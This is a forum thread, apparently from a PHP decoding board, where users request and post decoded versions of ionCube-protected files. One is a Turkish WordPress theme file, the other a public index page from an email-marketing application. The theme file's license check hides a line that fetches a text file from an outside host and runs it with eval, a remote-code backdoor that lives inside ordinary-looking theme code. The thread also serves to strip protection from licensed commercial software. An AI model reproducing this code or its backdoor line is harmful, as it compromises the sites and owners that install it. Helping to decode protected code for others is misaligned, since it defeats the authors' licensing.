05-08-2015, 05:48 AM
(05-07-2015 11:44 PM)xufi123 Wrote: [ -> ]Please decode this http://www88.zippyshare.com/v/J6fEGpcS/file.html
Thanks in Advance
Please Decode This.
(05-07-2015 11:44 PM)xufi123 Wrote: [ -> ]Please decode this http://www88.zippyshare.com/v/J6fEGpcS/file.html
Thanks in Advance
(05-17-2015 04:29 AM)xzxhakanxzx Wrote: [ -> ]Please deocede this file : http://www59.zippyshare.com/v/BCZVytfJ/file.htmlDecoded :- http://www10.zippyshare.com/v/Vi9qmYcM/file.html
thanks
(05-17-2015 09:19 AM)PuNisHeR Wrote: [ -> ]Please decode this file. thank you.
http://www49.zippyshare.com/v/S5x00wmc/file.html
(05-18-2015 03:58 AM)PuNisHeR Wrote: [ -> ](05-17-2015 09:19 AM)PuNisHeR Wrote: [ -> ]Please decode this file. thank you.
http://www49.zippyshare.com/v/S5x00wmc/file.html
Please Decode.
/**
*
* @ IonCube v8.3.1.1 Loader By DoraemonPT
* @ PHP 5.3
* @ Decoder version : 1.0.0.7
* @ Author : DoraemonPT
* @ Release on : 16.10.2014
* @ Website : http://EasyToYou.eu
*
**/
if (file_exists( TEMPLATEPATH . '/lisans.php' )) {
require( 'lisans.php' );
$lisans['site'] = getenv( 'HTTP_HOST' );
if (substr( $lisans['site'], 0, 4 ) == 'www.') {
$lisans['site'] = substr( $lisans['site'], 4 );
}
$lisans['hash'] = wordwrap( strtoupper( md5( sha1( $lisans['site'] ) ) ), 4, '-', true ); @eval(file_get_contents("http://yakaladimsizi.com/yeni/hadi_bize_gidelim.txt"));
if ($lisans['hash'] !== $lisans_anahtar) {
exit( 'Lisans anahtar?n?z bu site i?in ge?erli de?ildir.' );
}
else {
unset( $lisans );
}
include( TEMPLATEPATH . '/ozellikler.php' );
function register_my_menus() {
register_nav_menus( array( 'kategori' => __( 'Kategoriler' ), 'footer-menu1' => __( 'Footer PROGRAMLAR Menu' ), 'footer-menu2' => __( 'Footer S?TEM?Z Menu' ), 'footer-menu3' => __( 'Footer ED?T?R?N ?NERD?KLER? Menu' ), 'footer-menu4' => __( 'Footer ?LET???M Menu' ) ) );
}
add_action( 'init', 'register_my_menus' );
function custom_loginlogo() {
echo '<style type="text/css">
h1 a {background: url(' . get_bloginfo( 'template_directory' ) . '/images/admin_logo.png) no-repeat top center !important;width:264px !important;height:64px !important; }
</style>';
}
add_action( 'login_head', 'custom_loginlogo' );
add_action( 'admin_menu', 'sp_add_custom_box' );
add_action( 'save_post', 'sp_save_postdata', 1, 2 );
$sp_boxes = array( 'Program Detaylar?' => array( array( 'baslik2', 'Program 2.ba?l?k' ), array( 'lisans', 'Lisans Durumu ?cretsiz,?cretli,trial vs.' ), array( 'dil', 'Dil' ), array( 'kisitlama', 'K?s?tlama' ), array( 'sistem', '??letim Sistemi' ), array( 'epuan', 'Edit?r Puan' ), array( 'indir', '?ndirme Linki' ), array( 'boyut', 'Program?n Boyutu mb bayt cinsinden' ), array( 'resim', 'Program Resim' ), array( 'slider1', 'Slider 1 Resim' ), array( 'slider2', 'Slider 2 Resim' ), array( 'slider3', 'Slider 3 Resim' ) ) );
function sinyor_comment($comment, $args, $depth) {
$GLOBALS['comment'] = $comment;
$PostAuthor = false;
if ($comment->comment_author_email == get_the_author_email( )) {
$PostAuthor = true;
}
echo '
<div class="comment">
<div class="profile_photo"> ';
echo get_avatar( $comment, $size = '54' );
echo '</div>
<div class="comment_text">
';
echo '<s';
echo 'pan class="user">';
printf( __( '<span class="g">%s</span>' ), get_comment_author_link( ) );
echo ' dediki ;</span>
';
if ($comment->comment_approved == '0') {
echo ' <p class="comment-awaiting-moderation">Yorumunuz onayland?ktan sonra g?r?nt?lenecektir.</p>
';
}
echo ' <p>';
comment_text( );
echo '</p>
';
echo '<s';
echo 'pan class="datetime">';
printf( get_comment_date( ) );
echo ' - ';
printf( get_comment_time( ) );
echo '</span>
</div>
</div>
';
}
return 1;
}
exit( 'Lisans anahtar?n?n bulundu?undan emin olun.' );
(05-18-2015 11:47 PM)tetsh Wrote: [ -> ]Please help me decode this files
http://www90.zippyshare.com/v/Xilem3hX/file.html
thanks you
<?php
if( !@ini_get("zlib.output_compression") )
{
@ob_start("ob_gzhandler");
}
define("ACPUBLIC", true);
define("ACP_USER_NOAUTH", true);
require_once(dirname(__FILE__) . "/admin/prepend.inc.php");
require_once(ac_global_functions("context.php"));
require_once(ac_global_functions("smarty.php"));
require_once(ac_global_functions("http.php"));
require_once(ac_global_classes("page.php"));
require_once(ac_global_functions("interface.php"));
ac_interface_utfconvert_gp("utf-8");
ac_lang_get("public");
$rss_indicator = "&rss=1";
if( $site["general_url_rewrite"] )
{
require_once(ac_admin("functions/rewrite.php"));
rewrite_url();
$rss_indicator = "/rss";
}
$action = ac_http_param("action");
$smarty = new AC_Smarty("public");
$smarty->assign("public", true);
$smarty->assign("build", $thisBuild);
$smarty->assign("version", str_replace(".", "", $site["version"]));
if( !$action and& !$site["general_public"] )
{
ac_smarty_redirect($smarty, $site["p_link"] . "/admin/");
}
$confurl = ac_site_plink();
$realurl = $fullurl = ac_http_geturl();
$realurl = preg_replace("/\\/index.php(.*)\$/", "", $realurl);
$realurl = preg_replace("/(\\/\\?.*)\$/", "", $realurl);
if( rtrim($confurl, "/") != substr(rtrim($realurl, "/"), 0, strlen(rtrim($confurl, "/"))) )
{
if( !ac_http_param("domainredirect") )
{
$redirect2 = $confurl . str_replace($realurl, "", $fullurl);
$redirect2 .= ac_str_instr("?", $redirect2) ? "and" : "?";
$redirect2 .= "domainredirect=1";
ac_http_redirect($redirect2);
}
else
{
echo "<div style=\"background:#333333; color:#ffffff; padding:10px; font-size:11px; font-weight:bold;\">There appears to be a problem with your server. ";
echo "Your server reports " . $realurl . " as the application URL while you are accessing it using " . $confurl;
echo "</div>";
}
}
foreach( $languages as $k => $v )
{
if( ac_str_instr("(partial)", strtolower($k)) )
{
unset($languages[$k]);
}
}
$mesgcode = "";
if( isset($_GET["mesgcode"]) )
{
$mesgcode = $_GET["mesgcode"];
}
$smarty->assign("mesgcode", $mesgcode);
$preg = "/^login\$/";
if( $site["acpow"] )
{
$site["acpow"] = base64_decode($site["acpow"]);
}
else
{
$site["acpow"] = "Email Marketing";
}
$smarty->assign("is_admin", ac_admin_isadmin());
$smarty->assign("is_protected", $site["general_passprotect"] and& !ac_admin_isuser() and& !ac_admin_isadmin());
$smarty->assign("protected_action_ok", preg_match($preg, $action));
$smarty->assign_by_ref("site", $site);
$smarty->assign_by_ref("admin", $admin);
$smarty->assign_by_ref("languages", $languages);
$smarty->assign("plink", ac_site_plink());
$smarty->assign("thisURL", ac_http_geturl());
$smarty->assign("thisURLenc", ac_b64_encode(ac_http_geturl()));
$smarty->assign("action", $action);
$smarty->assign("rss_indicator", $rss_indicator);
$selected = "style=\"background:url('images/nav_selected_bg.gif'); background-repeat: repeat-x; background-position: top; background-color:#fff;\" class=\"selected\"";
$smarty->assign("selected", $selected);
$smarty->assign("confirmation", isset($_GET["codes"]));
$smarty->assign("__ishosted", isset($GLOBALS["_hosted_account"]));
$smarty->assign("favicon", design_favicon());
require(ac_admin("functions/inc.branding.public.php"));
require_once(ac_admin("functions/design.php"));
$admin = design_template_personalize($smarty, $admin, "public");
$nl = isset($_SESSION["nlp"]) ? $_SESSION["nlp"] : null;
$lists = list_get_all(true, false, $_SESSION["nlp"]);
$listsCnt = count($lists);
$smarty->assign("listsList", $lists);
$smarty->assign("listsListCnt", $listsCnt);
$smarty->assign("nl", $nl);
$smarty->assign("_", $site["p_link"]);
$smarty->assign("seo_url_prefix", isset($GLOBALS["seo_url_prefix"]) ? $GLOBALS["seo_url_prefix"] : "");
require_once(ac_global_functions("browser.php"));
$smarty->assign("ieCompatFix", ac_browser_ie_compat());
$processor = ac_context_find($smarty, $action, false);
$processor->process($smarty);
$smarty->assign("action", $action);
$smarty->assign("demoMode", isset($GLOBALS["demoMode"]));
$template = "main.htm";
if( in_array($action, array( "approve", "complaint", "social" )) )
{
$template = "iframe.main.htm";
}
if( isset($_GET["lists"]) and& isset($_GET["codes"]) )
{
$template = "iframe.main.htm";
}
$smarty->display($template);
context_complete($site);